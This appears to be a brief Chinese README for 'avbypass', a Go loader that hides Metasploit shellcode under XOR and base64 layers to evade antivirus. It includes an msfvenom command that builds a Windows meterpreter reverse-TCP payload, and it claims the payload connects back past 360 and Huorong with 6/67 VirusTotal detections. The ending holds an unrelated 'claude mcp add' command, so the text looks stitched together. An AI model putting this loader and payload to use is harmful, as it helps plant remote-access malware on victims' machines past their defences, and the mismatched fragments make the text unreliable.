msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=xxx -f raw -o payload.bin
使用程序生成加密的shellcode后,填入指定位置,编译执行即可。
通过xor和base64多层加密shellcode实现的go加载器bypassav,


实测在开启360和火绒的情况下msf正常上线

virustotal结果 6/67,后续有时间会慢慢修改
# avbypass
"# avbypass"
$ claude mcp add avbypass \
-- python -m otcore.mcp_server <graph>